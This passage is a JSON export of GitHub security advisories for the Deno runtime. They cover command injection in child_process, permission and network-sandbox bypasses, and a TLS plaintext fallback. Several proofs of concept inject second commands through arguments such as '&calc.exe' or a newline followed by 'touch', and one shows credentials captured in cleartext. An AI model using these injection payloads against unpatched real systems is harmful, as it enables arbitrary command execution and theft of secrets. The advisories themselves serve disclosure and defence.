2.8.0"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05eGc0LXFobTQtZzQzd84ABY0m/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03eGgzLW1oZzktamN3OM4ABY0l","url":"https://github.com/advisories/GHSA-7xh3-mhg9-jcw8","title":"Deno: Command Injection via spawnSync \u0026 spawn on Windows","description":"## Summary\n\nDeno's `node:child_process` implementation provided an `escapeShellArg()` helper used when callers passed `shell: true` to `spawn` / `spawnSync` / `exec` and friends. On Windows, the helper failed to quote arguments that contained `cmd.exe` metacharacters such as `\u0026`, `|`, `\u003c`, `\u003e`, `^`, `!`, `(`, `)`, and did not neutralize `%` (which `cmd.exe` expands even inside double-quoted strings). An attacker who controlled any portion of an argument passed to such a call could inject arbitrary additional commands into the spawned `cmd.exe` invocation.\n\nThis was the Windows counterpart to CVE-2026-27190, which fixed the same class of bug in the Unix branch of `escapeShellArg`.\n\n## Details\n\nOn Windows, `child_process` with `shell: true` ran the command via `cmd.exe /d /s /c \"\u003ccommand line\u003e\"`. Deno assembled that command line by joining the program name and each argument through `escapeShellArg()`.\n\nThe vulnerable check was:\n\n```ts\n// If no special characters, return as-is\nif (!/[\\s\"\\\\]/.test(arg)) {\n  return arg;\n}\n```\n\nThe regex covered only whitespace, double-quote, and backslash. Any argument containing `cmd.exe`-significant characters but none of those three was returned unquoted and therefore interpreted by the shell. The most straightforward exploit chained commands with `\u0026`:\n\n```js\nimport { spawnSync } from \"node:child_process\";\n\nspawnSync(\"echo\", [\"test\u0026calc.exe\"], { shell: true, encoding: \"utf-8\" });\n```\n\nThe reporter confirmed this launched `calc.exe` on Windows 11 with Deno 2.7.5. The same shape worked for `|`, `\u003c`, `\u003e`, `^`, `!`, `(`, and `)`.\n\nA secondary defect existed even when arguments were quoted: `cmd.exe` expands `%FOO%` environment-variable references inside double-quoted strings. Without either doubling `%` or rejecting it, an argument like `\"%USERPROFILE%\"` leaked environment data into the command line.\n\n## Proof of concept\n\nFrom the report, run on Windows with Deno `\u003c 2.7.10`:\n\n```js\nimport { spawnSync } from \"node:child_process\";\n\nconst maliciousInput = \"test\u0026calc.exe\";\nconst result = spawnSync(\"echo\", [maliciousInput], {\n  shell: true,\n  encoding: \"utf-8\",\n});\nconsole.log(result);\n```\n\nObserved: `calc.exe` launched as a side effect of the `echo` call.\n\n## Impact\n\nAny Deno program on Windows that called `child_process.spawn` / `spawnSync` / `exec` (or any shell helper that funneled through `escapeShellArg`) with `shell: true` and incorporated untrusted input into an argument was exposed to arbitrary command execution in the context of the Deno process. The CVSS vector treated this as network-reachable / high-complexity because the typical exposure path was a Deno service accepting external input and forwarding it to a shelled-out subprocess.\n\nNot affected:\n\n- Calls without `shell: true` (the default), which executed the program directly via `CreateProcess` without `cmd.exe` interpretation.\n- Unix platforms, which used the single-quote branch of `escapeShellArg` and were already fixed under CVE-2026-27190.\n- Callers that built command strings themselves and passed them as a single string with `shell: true` — those were the caller's responsibility and were never sanitized by Deno.\n\n## Workarounds\n\nUsers on unpatched versions could mitigate by:\n\n- Avoiding `shell: true` in `node:child_process` calls on Windows.\n- Building the argv directly and invoking the program without a shell.\n- Filtering or rejecting any externally-supplied argument values that contained `cmd.exe` metacharacters (`\u0026 | \u003c \u003e ^ ! ( ) %`) before passing them to `spawn` / `spawnSync` / `exec`.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-06-16T19:07:44.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-7xh3-mhg9-jcw8","https://nvd.nist.gov/vuln/detail/CVE-2026-49402","https://github.com/advisories/GHSA-7xh3-mhg9-jcw8"],"source_kind":"github","identifiers":["GHSA-7xh3-mhg9-jcw8","CVE-2026-49402"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-16T20:00:08.861Z","updated_at":"2026-08-29T17:01:28.615Z","epss_percentage":0.00445,"epss_percentile":0.36817,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03eGgzLW1oZzktamN3OM4ABY0l","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03eGgzLW1oZzktamN3OM4ABY0l","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.7.10","vulnerable_version_range":"\u003c 2.7.10"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03eGgzLW1oZzktamN3OM4ABY0l/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS00YzhnLWp2Y3gtdjRods4ABY0k","url":"https://github.com/advisories/GHSA-4c8g-jvcx-v4hv","title":"Deno: process.loadEnvFile() bypasses env permission checks and mutates process.env with only read access","description":"## Summary\n\nIn Deno, environment access is gated by the `env` permission. You can deny it\nwith `--deny-env`, or restrict it to a specific allowlist with\n`--allow-env=FOO,BAR`. The expectation is that a program running without `env`\npermission cannot change `process.env`.\n\n`process.loadEnvFile()` (the Node-compatible API for loading variables from a\n`.env` file) does **not** honor this. It only checks that the program has\n**read** permission for the dotenv file, then writes every key in that file\ninto the process environment — even when `env` access is denied.\n\nIn effect, **`--allow-read` plus a writable or attacker-controlled `.env` file\nis enough to defeat `--deny-env`.**\n\n## Am I affected?\n\nYou are potentially affected if **all** of the following are true:\n\n1. You run Deno **v2.3.0 or newer**.\n2. Your program (or any dependency it imports) calls `process.loadEnvFile()`\n   from `node:process`.\n3. You rely on Deno's permission model — specifically `--deny-env`, an\n   `--allow-env=…` allowlist, or running without granting `env` — as a\n   security boundary.\n4. The `.env` path passed to `loadEnvFile()` can be controlled or modified by\n   a less-trusted party (untrusted input, user-writable directory, third-party\n   dependency, etc.) and is covered by your `--allow-read` grant.\n\nIf your program does not use `process.loadEnvFile()` at all, or if it already\ngrants full `env` access, this advisory does not change your risk.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-06-16T19:04:57.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.2,"cvss_vector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-4c8g-jvcx-v4hv","https://nvd.nist.gov/vuln/detail/CVE-2026-49983","https://github.com/advisories/GHSA-4c8g-jvcx-v4hv"],"source_kind":"github","identifiers":["GHSA-4c8g-jvcx-v4hv","CVE-2026-49983"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-16T20:00:08.861Z","updated_at":"2026-08-29T17:01:28.615Z","epss_percentage":0.0014,"epss_percentile":0.03547,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00YzhnLWp2Y3gtdjRods4ABY0k","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS00YzhnLWp2Y3gtdjRods4ABY0k","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.8.1","vulnerable_version_range":"\u003c= 2.8.0"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00YzhnLWp2Y3gtdjRods4ABY0k/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS04M3BjLTNydzktcXB3as4ABY0j","url":"https://github.com/advisories/GHSA-83pc-3rw9-qpwj","title":"Deno: WebSocket API sandbox bypass via missing post-DNS check","description":"## Summary\n\nWhen a WebSocket connection was opened, Deno checked the destination hostname\nagainst `--deny-net` rules but did not re-check the IP addresses that hostname\nresolved to. An attacker-controlled script could use a specially crafted domain\nname that passes the hostname check yet resolves to a denied IP, bypassing the\nnetwork restriction entirely.\n\n## Impact\n\nCode running under `--deny-net` could connect to hosts that the user intended\nto block. In practice this means network isolation rules — for example,\nblocking access to `localhost` or internal services — could be silently\ncircumvented by a malicious or compromised dependency.\n\n`Deno.connect` and `fetch()` were not affected by this specific issue (a\ncompanion advisory covers `fetch()`).\n\n## Who is affected\n\nUsers who:\n\n- run untrusted or third-party code with `deno run`, and\n- rely on `--deny-net` to restrict which hosts that code can reach.\n\nIf you do not use `--deny-net`, or if you only run fully trusted code, you are\nnot affected.\n\n## Workaround\n\nNo workaround is available short of upgrading. If upgrading immediately is not\npossible, avoid granting `--allow-net` to untrusted code that also has\n`--deny-net` restrictions you depend on for security.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-06-16T19:04:07.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.2,"cvss_vector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-83pc-3rw9-qpwj","https://nvd.nist.gov/vuln/detail/CVE-2026-49860","https://github.com/advisories/GHSA-83pc-3rw9-qpwj"],"source_kind":"github","identifiers":["GHSA-83pc-3rw9-qpwj","CVE-2026-49860"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-16T20:00:08.862Z","updated_at":"2026-08-29T17:01:28.616Z","epss_percentage":0.00141,"epss_percentile":0.03638,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04M3BjLTNydzktcXB3as4ABY0j","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04M3BjLTNydzktcXB3as4ABY0j","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.8.1","vulnerable_version_range":"\u003c= 2.8.0"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04M3BjLTNydzktcXB3as4ABY0j/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1jcGdqLWY3ZzMtMnBwMs4ABY0i","url":"https://github.com/advisories/GHSA-cpgj-f7g3-2pp2","title":"Deno: `fetch()` API sandbox bypass via missing DNS resolution check","description":"## Summary\n\nWhen `fetch()` was called, Deno checked the destination hostname against\n`--deny-net` rules but did not re-check the IP addresses that hostname\nresolved to. An attacker-controlled script could use a specially crafted domain\nname that passes the hostname check yet resolves to a denied IP, bypassing the\nnetwork restriction entirely.\n\n## Impact\n\nCode running under `--deny-net` could reach hosts that the user intended to\nblock. In practice this means network isolation rules — for example, blocking\naccess to `localhost` or internal services — could be silently circumvented by\na malicious or compromised dependency.\n\nA companion advisory covers the same class of issue in the WebSocket API.\n\n## Who is affected\n\nUsers who:\n\n- run untrusted or third-party code with `deno run`, and\n- rely on `--deny-net` to restrict which hosts that code can reach.\n\nIf you do not use `--deny-net`, or if you only run fully trusted code, you are\nnot affected.\n\n## Workaround\n\nNo workaround is available short of upgrading. If upgrading immediately is not\npossible, avoid granting `--allow-net` to untrusted code that also has\n`--deny-net` restrictions you depend on for security.\n\n## Fix\n\nThe `fetch()` DNS resolver now performs a post-resolution check on every IP\naddress before passing it to the HTTP connector, consistent with how\n`Deno.connect` already behaved.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-06-16T19:02:55.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.2,"cvss_vector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-cpgj-f7g3-2pp2","https://nvd.nist.gov/vuln/detail/CVE-2026-49859","https://github.com/advisories/GHSA-cpgj-f7g3-2pp2"],"source_kind":"github","identifiers":["GHSA-cpgj-f7g3-2pp2","CVE-2026-49859"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-16T20:00:08.862Z","updated_at":"2026-08-29T17:01:28.616Z","epss_percentage":0.00141,"epss_percentile":0.03638,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jcGdqLWY3ZzMtMnBwMs4ABY0i","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1jcGdqLWY3ZzMtMnBwMs4ABY0i","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.8.1","vulnerable_version_range":"\u003c= 2.8.0"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jcGdqLWY3ZzMtMnBwMs4ABY0i/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1jaHF2LTU2d3YtNzU2NM4ABXkw","url":"https://github.com/advisories/GHSA-chqv-56wv-7564","title":"Deno's TLS retry copies stale upgrade hook, risking plaintext traffic","description":"## Summary\n\nA flaw in Deno's Node.js tls compatibility layer could cause a TLS client to transmit application data in plaintext after a connection retry. When `autoSelectFamily was enabled and the first address-family attempt failed, the socket reinitialization path reused a stale TLS upgrade hook that was bound to the original, failed handle. \n\nAs a result, the replacement TCP connection was never upgraded to TLS, and any data the application wrote before the `secureConnect` event travelled over the network unencrypted.\n\nA network attacker positioned to cause the initial connection attempt to fail (for example, by dropping IPv6 traffic on a dual-stack host) could deterministically trigger the fallback path and observe or tamper with traffic that the application believed was TLS-protected.\n\n**Affected APIs**: Applications using Deno's `node:tls` or `node:https` surface with `autoSelectFamily` enabled (the default) that wrote to the socket before the `secureConnect` event.\n\n## Proof of concept\n\n`attacker.mjs` (captures whatever the client sends)\n\n```ts\nimport net from \"node:net\";\n\nconst server = net.createServer((socket) =\u003e {\n  console.log(\"[attacker] client connected from\", socket.remoteAddress);\n  socket.on(\"data\", (chunk) =\u003e {\n    // If TLS were working, this would be an opaque ClientHello.\n    // If the bug fires, we see the application payload in cleartext.\n    console.log(\"[attacker] received\", chunk.length, \"bytes:\");\n    console.log(chunk.toString(\"utf8\"));\n  });\n});\n\nserver.listen(4444, \"127.0.0.1\", () =\u003e {\n  console.log(\"[attacker] listening on 127.0.0.1:4444\");\n});\n```\n\n`victim.mjs` (a normal-looking TLS client)\n\n```ts\nimport tls from \"node:tls\";\n\nconst socket = tls.connect({\n  host: \"api.example.invalid\",\n  port: 4444,\n  autoSelectFamily: true, // Node-compat default\n\n  // First address is a black hole (nothing on [::1]:4444),\n  // so autoSelectFamily falls back to the second address.\n  // In a real attack, the on-path attacker arranges this via\n  // routing, DNS, or by dropping the first SYN.\n  lookup: (_host, _opts, cb) =\u003e {\n    cb(null, [\n      { address: \"::1\",       family: 6 }, // fails -\u003e retry\n      { address: \"127.0.0.1\", family: 4 }, // attacker\n    ]);\n  },\n\n  rejectUnauthorized: false,\n});\n\n// Application writes BEFORE secureConnect — common pattern in\n// Node clients that pipe a request body or send a greeting.\nsocket.write(\"POST /v1/charge HTTP/1.1\\r\\n\");\nsocket.write(\"Authorization: Bearer sk_live_SECRET_TOKEN\\r\\n\");\nsocket.write(\"Content-Type: application/json\\r\\n\\r\\n\");\nsocket.write(JSON.stringify({ amount: 100, card: \"4242424242424242\" }));\n\nsocket.on(\"secureConnect\", () =\u003e console.log(\"[victim] secureConnect\"));\nsocket.on(\"error\",         (e) =\u003e console.log(\"[victim] error:\", e.message));\n```\n\n\nIn terminal 1 `deno run --allow-net attacker.mjs`\nIn terminal 2 `deno run --allow-net victim.mjs`\n\n### Expected vs. observed\n\nOn a patched Deno (≥ 2.7.8), the attacker terminal sees an opaque TLS ClientHello (a binary blob starting with `0x16 0x03\n0x01 …`), and the victim eventually errors out because the attacker isn't speaking TLS.\n\nOn a vulnerable Deno (≥ 2.0.0, \u003c 2.7.8), the attacker terminal prints:\n\n```\n[attacker] received 41 bytes:\nPOST /v1/charge HTTP/1.1\nAuthorization: Bearer sk_live_SECRET_TOKEN\n...\n```\n\nThe bearer token, the request body, and the card number all appear in plaintext, even though the application used\n`tls.connect`.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-27T19:51:46.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.4,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-chqv-56wv-7564","https://nvd.nist.gov/vuln/detail/CVE-2026-44726","https://github.com/advisories/GHSA-chqv-56wv-7564"],"source_kind":"github","identifiers":["GHSA-chqv-56wv-7564","CVE-2026-44726"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-27T20:00:08.974Z","updated_at":"2026-08-29T17:01:46.173Z","epss_percentage":0.00234,"epss_percentile":0.14104,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jaHF2LTU2d3YtNzU2NM4ABXkw","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1jaHF2LTU2d3YtNzU2NM4ABXkw","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.7.8","vulnerable_version_range":"\u003e= 2.0.0, \u003c 2.7.8"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jaHF2LTU2d3YtNzU2NM4ABXkw/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS00Yzk2LXc4djItcDI4as4ABTlo","url":"https://github.com/advisories/GHSA-4c96-w8v2-p28j","title":"Deno vulnerable to command Injection via incomplete shell metacharacter blocklist in node:child_process","description":"## Summary\n\n  A command injection vulnerability exists in Deno's `node:child_process` polyfill (`shell: true` mode) that bypasses the fix\n  for CVE-2026-27190 (GHSA-hmh4-3xvx-q5hr). An attacker who controls arguments passed to `spawnSync` or `spawn` with `shell:\n  true` can execute arbitrary OS commands, bypassing Deno's permission system.\n\n  **Affected versions:** Deno v2.7.0, v2.7.1\n\n  ## Details\n\n  The two-stage argument sanitization in `transformDenoShellCommand` (`ext/node/polyfills/internal/child_process.ts`) has a\n  priority bug: when an argument contains a `$VAR` pattern, it is wrapped in double quotes (L1290) instead of single quotes\n  (L1293). Double quotes in POSIX sh do not suppress backtick command substitution, allowing injected commands to execute.\n\n  Attack chain:\n  1. `escapeShellArg` wraps the argument in single quotes (safe)\n  2. `op_node_parse_shell_args` strips the single-quote delimiters during tokenization (raw argument exposed)\n  3. Re-quoting detects `$VAR` pattern → applies double quotes\n  4. Backtick payload inside double quotes executes via `/bin/sh`\n\n  ## Impact\n\n  **OS Command Injection (CWE-78)**. Any application using `node:child_process` `spawn`/`spawnSync` with `shell: true` and\n  user-controlled arguments is vulnerable. Injected commands execute at the OS process level, outside Deno's permission\n  sandbox. Only `--allow-run` is required.\n\n  ## Mitigation\n\n  Avoid passing user-controlled input as arguments to `spawn`/`spawnSync` with `shell: true`. Use `shell: false` (the default)\n  instead, or validate/sanitize inputs before passing them.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-03-13T20:02:18.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-4c96-w8v2-p28j","https://nvd.nist.gov/vuln/detail/CVE-2026-32260","https://github.com/advisories/GHSA-4c96-w8v2-p28j"],"source_kind":"github","identifiers":["GHSA-4c96-w8v2-p28j","CVE-2026-32260"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-13T21:00:09.230Z","updated_at":"2026-08-29T17:03:11.195Z","epss_percentage":0.01483,"epss_percentile":0.71507,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00Yzk2LXc4djItcDI4as4ABTlo","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS00Yzk2LXc4djItcDI4as4ABTlo","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.7.2","vulnerable_version_range":"\u003e= 2.7.0, \u003c 2.7.2"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00Yzk2LXc4djItcDI4as4ABTlo/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1obWg0LTN4dngtcTVocs4ABSmq","url":"https://github.com/advisories/GHSA-hmh4-3xvx-q5hr","title":"Deno has a Command Injection via Incomplete shell metacharacter blocklist in node:child_process","description":"## Summary\nA command injection vulnerability exists in Deno's `node:child_process` implementation. \n\n## Reproduction\n```javascript\nimport { spawnSync } from \"node:child_process\";\nimport * as fs from \"node:fs\";\n\n// Cleanup\ntry { fs.unlinkSync('/tmp/rce_proof'); } catch {}\n\n// Create legitimate script\nfs.writeFileSync('/tmp/legitimate.ts', 'console.log(\"normal\");');\n\n// Malicious input with newline injection\nconst maliciousInput = `/tmp/legitimate.ts\\ntouch /tmp/rce_proof`;\n\n// Vulnerable pattern\nspawnSync(Deno.execPath(), ['run', '--allow-all', maliciousInput], {\n  shell: true,\n  encoding: 'utf-8'\n});\n\n// Verify\nconsole.log('Exploit worked:', fs.existsSync('/tmp/rce_proof'));\n```\n\nRun: `deno run --allow-all poc.mjs`\n\nThe file `/tmp/rce_proof` is created, confirming arbitrary command execution.\n\n## Mitigation\n\nAll users need to update to the patched version (Deno v2.6.8).","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-02-19T20:31:41.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-hmh4-3xvx-q5hr","https://github.com/denoland/deno/commit/9132ad958c83a0d0b199de12b69b877f63edab4c","https://github.com/denoland/deno/releases/tag/v2.6.8","https://nvd.nist.gov/vuln/detail/CVE-2026-27190","https://github.com/advisories/GHSA-hmh4-3xvx-q5hr"],"source_kind":"github","identifiers":["GHSA-hmh4-3xvx-q5hr","CVE-2026-27190"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-02-19T21:00:08.821Z","updated_at":"2026-08-29T17:03:38.071Z","epss_percentage":0.02213,"epss_percentile":0.80508,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1obWg0LTN4dngtcTVocs4ABSmq","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1obWg0LTN4dngtcTVocs4ABSmq","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.6.8","vulnerable_version_range":"\u003c 2.6.8"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1obWg0LTN4dngtcTVocs4ABSmq/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1tM2M0LXByaHctbXJ4Ns4ABRLc","url":"https://github.com/advisories/GHSA-m3c4-prhw-mrx6","title":"Deno has an incomplete fix for command-injection prevention on Windows — case-insensitive extension bypass","description":"### Summary\nA prior patch aimed to block spawning Windows batch/shell files by returning an error when a spawned path’s extension matched `.bat` or `.cmd`. That check performs a case-sensitive comparison against lowercase literals and therefore can be bypassed when the extension uses alternate casing (for example `.BAT, .Bat`, etc.).\n\n### POC\n```javascript\nconst command = new Deno.Command('./test.BAT', {\n  args: ['\u0026calc.exe'],\n});\nconst child = command.spawn();\n```\nThis causes `calc.exe` to be launched; see the attached screenshot for evidence.\n\n**Patched in `CVE-2025-61787` — prevents execution of `.bat` and `.cmd` files:**\n![photo_2025-10-10 02 27 23](https://github.com/user-attachments/assets/43df25e2-e2e1-48aa-8060-cb0a22637f1f)\n\n**Bypass of the patched vulnerability:**\n![photo_2025-10-10 02 27 25](https://github.com/user-attachments/assets/2be1afb4-84a1-4883-8e18-6a174fdd3615)\n\n\n### Impact\nThe script launches calc.exe on Windows, demonstrating that passing user-controlled arguments to a spawned batch script can result in command-line injection.\n\n### Mitigation\n\nUsers should update to Deno v2.5.6 or newer.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-01-16T15:49:38.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-m3c4-prhw-mrx6","https://nvd.nist.gov/vuln/detail/CVE-2026-22864","https://github.com/denoland/deno/releases/tag/v2.5.6","https://github.com/advisories/GHSA-m3c4-prhw-mrx6"],"source_kind":"github","identifiers":["GHSA-m3c4-prhw-mrx6","CVE-2026-22864"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-01-16T16:00:08.575Z","updated_at":"2026-09-07T05:04:15.956Z","epss_percentage":0.00644,"epss_percentile":0.4857,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tM2M0LXByaHctbXJ4Ns4ABRLc","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1tM2M0LXByaHctbXJ4Ns4ABRLc","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.5.6","vulnerable_version_range":"\u003c 2.5.6"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tM2M0LXByaHctbXJ4Ns4ABRLc/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS01Mzc5LWY1aGYtdzM4ds4ABRLb","url":"https://github.com/advisories/GHSA-5379-f5hf-w38v","title":"Deno node:crypto doesn't finalize cipher","description":"### Summary\n\nThe vulnerability allows an attacker to have infinite encryptions. \n\nThis can lead to naive attempts at brute forcing, as well as more refined attacks with the goal to learn the server secrets.\n\n### PoC\n```js\nimport crypto from \"node:crypto\";\n\nconst key = crypto.randomBytes(32);\nconst iv = crypto.randomBytes(16);\nconst cipher = crypto.createCipheriv(\"aes-256-cbc\", key, iv);\ncipher.final()\n\nconsole.log(cipher);\n```\n\n### Expected Output\n```js\nCipheriv {\n  _decoder: null,\n  _options: undefined,\n  Symbol(kHandle): CipherBase {}\n}\n```\n\n### Actual Output\n```js\nCipheriv {\n  _events: {\n    close: undefined,\n    error: undefined,\n    prefinish: [Function: prefinish],\n    finish: undefined,\n    drain: undefined,\n    data: undefined,\n    end: undefined,\n    readable: undefined\n  },\n  _readableState: ReadableState {\n    highWaterMark: 65536,\n    buffer: [],\n    bufferIndex: 0,\n    length: 0,\n    pipes: [],\n    awaitDrainWriters: null,\n    [Symbol(kState)]: 1048844\n  },\n  _writableState: WritableState {\n    highWaterMark: 65536,\n    length: 0,\n    corked: 0,\n    onwrite: [Function: bound onwrite],\n    writelen: 0,\n    bufferedIndex: 0,\n    pendingcb: 0,\n    [Symbol(kState)]: 17580812,\n    [Symbol(kBufferedValue)]: null\n  },\n  allowHalfOpen: true,\n  _final: [Function: final],\n  _maxListeners: undefined,\n  _transform: [Function: transform],\n  _eventsCount: 1,\n  [Symbol(kCapture)]: false,\n  [Symbol(kCallback)]: null\n}\n```\n\n### Mitigations\n\nAll users should upgrade to Deno v2.6.0 or newer.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2026-01-16T15:49:35.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.2,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-5379-f5hf-w38v","https://nvd.nist.gov/vuln/detail/CVE-2026-22863","https://github.com/denoland/deno/releases/tag/v2.6.0","https://github.com/advisories/GHSA-5379-f5hf-w38v"],"source_kind":"github","identifiers":["GHSA-5379-f5hf-w38v","CVE-2026-22863"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-01-16T16:00:08.575Z","updated_at":"2026-08-29T17:03:52.731Z","epss_percentage":0.00199,"epss_percentile":0.09915,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01Mzc5LWY1aGYtdzM4ds4ABRLb","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01Mzc5LWY1aGYtdzM4ds4ABRLb","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.6.0","vulnerable_version_range":"\u003c= 2.5.6"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01Mzc5LWY1aGYtdzM4ds4ABRLb/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1tMmdmLXgzZjYtOGhxM84ABNIf","url":"https://github.com/advisories/GHSA-m2gf-x3f6-8hq3","title":"Deno is Vulnerable to Command Injection on Windows During Batch File Execution","description":"### Summary\nDeno versions up to 2.5.1 are vulnerable to Command Line Injection attacks on Windows when batch files are executed.\n\n### Details\nIn Windows, ``CreateProcess()`` always implicitly spawns ``cmd.exe`` if a batch file (.bat, .cmd, etc.) is being executed even if the application does not specify it via the command line. This makes Deno vulnerable to a command injection attack on Windows as demonstrated by the two proves-of-concept below.\n\n### PoC\nUsing `node:child_process` (with the `env` and `run` permissions):\n```JS\nconst { spawn } = require('node:child_process');\nconst child = spawn('./test.bat', ['\u0026calc.exe']);\n```\nUsing `Deno.Command.spawn()` (with the `run` permission):\n```JS\nconst command = new Deno.Command('./test.bat', {\n  args: ['\u0026calc.exe'],\n});\nconst child = command.spawn();\n```\n\n### Impact\nBoth of these scripts result in opening calc.exe on Windows, thus allowing a Command Line Injection attack when user-provided arguments are passed if the script being executed by the child process is a batch 